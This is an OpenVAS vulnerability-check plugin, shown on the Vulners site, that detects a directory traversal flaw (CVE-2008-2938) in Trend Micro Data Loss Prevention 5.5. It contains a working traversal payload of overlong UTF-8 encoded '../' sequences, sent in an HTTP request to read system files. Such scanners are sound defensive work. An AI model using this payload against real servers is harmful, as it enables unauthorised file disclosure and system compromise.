Trend Micro Data Loss Prevention 5.5 Directory Traversal Vulnerability
🗓️ 14 Jun 2011 00:00:00Reported by Copyright (C) 2011 Greenbone AGType
openvas🔗 plugins.openvas.org👁 41 Views
| Reporter | Title | Published | Views | Family All 117 |
|---|---|---|---|---|
| Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability | 11 Aug 200800:00 | – | zdt | |
| ToutVirtual VirtualIQ Pro 3.2 Multiple Vulnerabilities | 7 Nov 200900:00 | – | zdt | |
| Apache Tomcat 4.1.x < 4.1.38 / 5.5.x < 5.5.27 / 6.0.x < 6.0.18 Linking UTF-8 Traversal Arbitrary File Access | 12 Aug 200800:00 | – | nessus | |
| CentOS 5 : tomcat5 (CESA-2008:0648) | 6 Jan 201000:00 | – | nessus | |
| Fedora 9 : tomcat6-6.0.18-1.1.fc9 (2008-7977) | 12 Sep 200800:00 | – | nessus | |
| Fedora 9 : tomcat5-5.5.27-0jpp.2.fc9 (2008-8113) | 17 Sep 200800:00 | – | nessus | |
| Fedora 8 : tomcat5-5.5.27-0jpp.2.fc8 (2008-8130) | 17 Sep 200800:00 | – | nessus | |
| Mac OS X Multiple Vulnerabilities (Security Update 2008-007) | 10 Oct 200800:00 | – | nessus | |
| Mandriva Linux Security Advisory : tomcat5 (MDVSA-2008:188) | 23 Apr 200900:00 | – | nessus | |
| MiracleLinux 3 : tomcat5-5.5.23-0jpp.7.1.1AXS3 (AXSA:2008-90:02) | 14 Jan 202600:00 | – | nessus |
10
# SPDX-FileCopyrightText: 2011 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:trend_micro:data_loss_prevention";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.103182");
script_version("2025-06-25T05:41:02+0000");
# nb: The bug on the product is caused by a vuln in Apache Tomcat, thus the related Tomcat CVE
# here.
script_cve_id("CVE-2008-2938");
script_tag(name:"last_modification", value:"2025-06-25 05:41:02 +0000 (Wed, 25 Jun 2025)");
script_tag(name:"creation_date", value:"2011-06-14 13:57:36 +0200 (Tue, 14 Jun 2011)");
script_name("Trend Micro Data Loss Prevention 5.5 Directory Traversal Vulnerability");
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:N/A:N");
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("Copyright (C) 2011 Greenbone AG");
script_dependencies("gb_trend_micro_data_loss_prevention_detect.nasl", "os_detection.nasl");
script_require_ports("Services/www", 8443);
script_mandatory_keys("trendmicro/datalossprevention/detected");
script_xref(name:"URL", value:"https://web.archive.org/web/20210127105722/http://www.securityfocus.com/bid/48225");
script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/17388");
script_tag(name:"summary", value:"Trend Micro Data Loss Prevention is prone to a directory
traversal vulnerability because it fails to sufficiently sanitize user-supplied input.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");
script_tag(name:"impact", value:"A remote attacker could exploit this vulnerability using
directory traversal strings (such as '../') to gain access to arbitrary files on the targeted
system. This may result in the disclosure of sensitive information or lead to a complete
compromise of the affected computer.");
script_tag(name:"affected", value:"Trend Micro Data Loss Prevention 5.5 is known to be vulnerable.
Other versions may also be affected.");
script_tag(name:"insight", value:"Trend Micro Data Loss Prevention is shipping a vulnerable Apache
Tomcat version affected by a directory traversal vulnerability registered with the
CVE-2008-2938.");
script_tag(name:"solution", value:"No known solution was made available for at least one year
since the disclosure of this vulnerability. Likely none will be provided anymore. General solution
options are to upgrade to a newer release, disable respective features, remove the product or
replace the product by another one.");
script_tag(name:"solution_type", value:"WillNotFix");
script_tag(name:"qod_type", value:"remote_vul");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
include("os_func.inc");
include("traversal_func.inc");
if( ! port = get_app_port( cpe:CPE ) )
exit( 0 );
if( ! dir = get_app_location( cpe:CPE, port:port, service:"www" ) )
exit( 0 );
if( dir == "/" )
dir = "";
files = traversal_files();
foreach pattern( keys( files ) ) {
file = files[pattern];
url = string( dir, "//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/" + file );
if( http_vuln_check( port:port, url:url, pattern:pattern ) ) {
report = http_report_vuln_url( url:url, port:port );
security_message( port:port, data:report );
exit( 0 );
}
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Jun 2025 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
EPSS0.99708